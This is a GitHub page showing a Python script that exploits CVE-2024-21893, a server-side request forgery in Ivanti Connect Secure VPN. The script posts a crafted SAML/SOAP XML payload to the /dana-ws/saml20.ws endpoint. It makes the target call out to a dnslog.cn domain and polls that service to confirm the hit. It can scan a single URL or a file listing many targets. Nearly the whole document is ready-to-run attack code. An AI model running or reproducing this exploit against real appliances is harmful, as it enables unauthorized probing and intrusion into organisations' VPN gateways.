-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathCVE-2024-21893_IvantiConnectSecureVPN_SSRF.py
66 lines (62 loc) · 2.54 KB
/
CVE-2024-21893_IvantiConnectSecureVPN_SSRF.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def read_file(file_path):
with open(file_path, 'r') as file:
urls = file.read().splitlines()
return urls
def check(url):
url = url.rstrip("/")
taeget_url = urljoin(url, "/dana-ws/saml20.ws")
try:
headers = {
"User-Agent": "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95",
"Content-Type": "text/xml"
}
getdomain = requests.get(url='http://dnslog.cn/getdomain.php', headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
domain = str(getdomain.text)
data = f"""<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<ds:SignatureValue>dummy</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="http://test.{domain}"/>
<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>"""
requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=15)
for i in range(0, 3):
refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers={"Cookie": "PHPSESSID=hb0p9iqh804esb5khaulm8ptp2"}, timeout=30)
time.sleep(1)
if domain in refresh.text:
print(f"\033[31mDiscovered:{url}: CVE-2024-21893_IvantiConnectSecureVPN_SSRF!---domain_dns: test.{domain}\033[0m")
return True
except Exception as e:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL")
parser.add_argument("-f", "--txt", help="file")
args = parser.parse_args()
url = args.url
txt = args.txt
if url:
check(url)
elif txt:
urls = read_file(txt)
for url in urls:
check(url)
else:
print("help")